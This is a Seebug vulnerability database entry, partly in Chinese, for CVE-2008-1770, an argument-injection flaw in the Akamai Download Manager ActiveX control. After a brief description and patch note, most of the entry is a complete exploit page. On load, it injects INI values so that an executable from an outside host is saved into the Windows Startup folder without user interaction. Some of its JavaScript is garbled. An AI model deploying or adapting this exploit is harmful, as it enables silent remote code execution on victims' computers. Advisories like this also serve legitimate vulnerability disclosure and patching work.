Lucene search
RootSSV:3386HistoryJun 06, 2008 - 12:00 a.m.
Akamai下载管理器参数注入漏洞
2008-06-0600:00:00
Root
www.seebug.org
19
0.139 Low
EPSS
Percentile
95.1%
CVE(CAN) ID: CVE-2008-1770
Akamai下载管理器是用于帮助用户方便下载的客户端软件。
Akamai的ActiveX控件在处理参数数据时存在漏洞,远程攻击者可能利用此漏洞在用户系统的任意地方写入文件。
当用户从http://dlm.tools.akamai.com/tools/upgrade.html 下载安装Akamai下载管理器ActiveX控件时,其参数设置为:
<PARAM name="URL" value="http://dlm.tools.akamai.com/tools_files/Readme.txt">
然后设置URL值。但如果向URL注入其他字符的话,也可以正确的解析,例如:
<PARAM name="URL"
value="http://dlm.tools.akamai.com/tools_files/Readme.txt\x0Areferer=http://ruder.cdut.net">
由于ActiveX所设置的参数值以INI文件格式保存在临时文件中,上述方式会改变referer值。
此外,使用了target参数设置下载文件的位置,含义如下:
"DESKTOP" 将文件保存到桌面
"AUTO" 将文件保存到临时Internet文件中
"" 询问用户选择保存位置
正常情况下target值只能设置为以上三个值,其他值会被过滤掉。但如果通过参数注入将该值设置为有效的文件路径的话,就可以任意设置target,Akamai下载管理器会未经用户交互直接将目标文件下载到用户系统的任意位置
Akamai Download Manager < 2.2.3.6
Akamai
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://dlm.tools.akamai.com/tools/upgrade.html” target=“_blank”>http://dlm.tools.akamai.com/tools/upgrade.html</a>
<html>
<!--
/**********************************************************************************
Exploit start here, by cocoruder(frankruder_at_hotmail.com)
For "Akamai Download Manager File Download To Arbitrary Location Vulnerability".
This exploit will download "http://ruder.cdut.net/attach/calc.exe" to "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\calc_run.exe".
***********************************************************************************/
DLM: v2.2.3
Received: ActiveX, v2.2.3.5
Reason: MSIE 6
Language: en (Automatically detected)
-->
<head>
<!-- Begin head fragment -->
<title>Download Manager</title>
<script TYPE="text/javascript" LANGUAGE="javascript">
window.resizeTo(500,510);
</script>
<!-- End head fragment -->
<script language="JavaScript">
var bDocReady = false;
var bInsObj = false;
var isLinux = (navigator.userAgent.indexOf("Linux") >= 0);
var isMacFF = (navigator.userAgent.indexOf("Firefox") >= 0 && navigator.userAgent.indexOf("Mac") >= 0);
var isSafari = (navigator.userAgent.indexOf("Safari") >= 0);
var isSolaris = (navigator.userAgent.indexOf("Sun") >= 0);
var isWinFF = (navigator.userAgent.indexOf("Firefox") >= 0 && navigator.userAgent.indexOf("Windows") >= 0);
var isIE7 = (navigator.userAgent.indexOf("MSIE 7") >= 0);
function doLoad() {
// Start automatically
setTimeout("startDLM();", 1000);
return;
}
var bdmIsReady = false;
var bDMStarted = false;
var bDMFailed = false;
var bShutdown = false;
var startTries = 0;
function closeIt() {
if (isIE7) {
return;
}
if (bDMStarted && !bShutdown) {
event.returnValue = "The Download Manager is still running.\n"
"Pressing 'OK' will stop any active downloads and close the Download Manager.";
}
}
</script>
<noscript><meta http-equiv="Refresh" c /></noscript>
</head>
<body >
<!-- Begin body fragment -->
<table cellpadding="10" cellspacing="0" border="0">
<tr><td>
<strong>About the Download Manager</strong><br>
<p>The Download Manager provides for more effective, more efficient file downloads than you normally see with your browser, especially for large files or file sets. It can pause and restart downloads even if you turn your computer off and on again. You will be presented with a security warning and after you accept, the Download Manager will install and begin to download the requested file.</p>
<p>Should the Download Manager fail to start, or if you do not accept the security certificate, you can <a href=http://dlm.tools.akamai.com/tools_files/Readme.txt>click here</a> to download the file without using the download manager.</p><p/>
</td></tr>
</table>
<!-- End body fragment -->
<DIV ID="objectDIV"></DIV>
<script language="JavaScript">
// Initiate shutdown
function doDLMShutdown() {
if (bShutdown) {
return;
}
bShutdown = true;
window.opener = null;
window.close();
}
// Initiate the download
function doStart() {
startTries ;
if (startTries > 120) {
bDMFailed = true;
return;
}
try {
var dm = document.getElementById("dm");
if (dm == null) {
bDMFailed = true;
return;
}
dm.detachEvent("DLMShutdown", doDLMShutdown);
dm.attachEvent("DLMShutdown", doDLMShutdown);
dm.StartDownload();
bDMStarted = true;
} catch (e) {
bDMStarted = false;
if (e.description != "object Error") {
bDMFailed = true;
}
}
}
// Start the DLM
function startDLM() {
//alert("pause");
if (bDocReady) {
insertObj();
if (bdmIsReady) {
doStart();
}
}
if (bDMFailed) {
// Don't try to go direct, since this happens by
// default on XP SP2 and above.
return;
}
if (!bDMStarted) {
setTimeout("startDLM();", 500);
}
}
// Check if the DM object is fully loaded
function dmReady() {
var dm = document.getElementById("dm");
if (dm == null) {
bDMFailed = true;
return;
}
if (dm.readyState == 4) {
bdmIsReady = true;
}
}
// Check if the document is fully loaded
function docReady() {
if (document.readyState == "complete") {
bDocReady = true;
} else {
bDocReady = false;
}
}
// Insert the code to create the DM object
function insertObj() {
// Only insert the object once
if (!bInsObj) {
bInsObj = true;
// Create object tag
var sObjHTML = "<object id=\"dm\" classid=\"CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967\" CODEBASE=\"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.3.5.cab#Version=2,2,3,5\" width=1 height=1> "
" <PARAM name=\"logging\" value=\"1\"/> "
" <PARAM name=\"version\" value=\"2.2.3\"/> "
/**********************************************************************************
Exploit start here, by cocoruder(frankruder_at_hotmail.com)
For "Akamai Download Manager File Download To Arbitrary Location Vulnerability".
This exploit will download "http://ruder.cdut.net/attach/calc.exe" to "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\calc_run.exe".
***********************************************************************************/
" <PARAM name=\"URL\" value=\"http://ruder.cdut.net/attach/calc.exe\x0Areferer=http://ruder.cdut.net\x0Amd5=\x0Atarget=C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\calc_run.exe\x0AlogoURL=\x0AiconURL=\x0AproviderName=\x0Alaunch=\x0AcloseWhenDone=yes\x0Aresumable=\x0AdisregardQryStr=\x0AmaxCon=4\x0AinitialView=summary\x0AxPos=100\x0AyPos=100\x0Aicon=true\x0Aencrypt=\x0Alogging=1\x0AfgColor=\x0AbgColor=\x0ArecoveryUrl=http://dlm.tools.akamai.com/Readme.txt\x0AflushSize=32\x0Alanguage=en\x0AuseMD5=\x0AuseStateReporting=1\x0AbundleDetails=\x0AbundleEnabled=\x0ArequestSize=1024\x0AswooshEnabled=\x0AswooshInstall=\x0Acookie=\"/> "
" <PARAM name=\"recoveryURL\" value=\"http://dlm.tools.akamai.com/Readme.txt\"/> "
" <PARAM name=\"language\" value=\"en\"/> "
" <PARAM name=\"providerName\" value=\"\"/> "
" <PARAM name=\"maxCon\" value=\"4\"/> "
" <PARAM name=\"maxConn\" value=\"4\"/> "
" <PARAM name=\"requestSize\" value=\"1024\"/> "
" <PARAM name=\"flushSize\" value=\"32\"/> "
" <PARAM name=\"initialView\" value=\"summary\"/> "
" <PARAM name=\"icon\" value=\"true\"/> "
" <PARAM name=\"launch\" value=\"no\"/> "
" <PARAM name=\"closeWhenDone\" value=\"no\"/> "
"</object> ";
objdiv = document.getElementById("objectDIV");
if (objdiv == null) {
document.location.replace("http://dlm.tools.akamai.com/tools_files/Readme.txt");
return;
}
objdiv.innerHTML = sObjHTML;
if (dm == null) {
bDMFailed = true;
}
// Set up handler for DM readystate change
dm.onreadystatechange = dmReady;
dmReady();
}
}
// Set up handler for document readystate change
document.onreadystatechange = docReady;
</script>
</body>
</html>
Related
prion
prion
Crlf injection
2008-06-04 21:32:00
kaspersky
kaspersky
KLA10054 ACE vulnerability in Akamai Download Manager
2008-06-04 00:00:00
securityvulns
securityvulns
Akamai Technologies Security Advisory 2008-0001 (Download Manager)
2008-06-05 00:00:00
Akamai Download Manager ActiveX code execution
2008-06-05 00:00:00
Akamai Download Manager File Downloaded To Arbitrary Location Vulnerability
2008-06-05 00:00:00
nessus
nessus
Akamai Download Manager ActiveX Control < 2.2.3.6 Arbitrary File Download
2008-06-05 00:00:00
cve
cve
CVE-2008-1770
2008-06-04 21:32:00